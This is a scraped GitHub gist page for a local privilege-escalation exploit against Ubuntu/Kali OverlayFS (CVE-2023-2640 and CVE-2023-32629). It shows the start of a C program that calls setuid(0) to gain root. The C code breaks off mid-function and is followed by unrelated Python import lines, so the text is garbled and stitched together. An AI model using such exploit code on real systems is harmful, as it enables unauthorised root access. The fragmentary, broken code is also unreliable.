Skip to content

Instantly share code, notes, and snippets.

View Avento's full-sized avatar
🏀
唱跳RAP篮球✋

Yiuwai Je Avento

🏀
唱跳RAP篮球✋
View GitHub Profile
@win3zz
win3zz / GameOver(lay).md
Last active January 3, 2025 05:42
Privilege escalation vulnerabilities in Ubuntu/Kali Linux (CVE-2023-2640 and CVE-2023-32629)
user@hostname:~/exploit$ cat > test.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    if (setuid(0) != 0) {
import base64
import re
import xml.dom.minidom
import json
import uuid
import struct
import string
import random
import hashlib
import time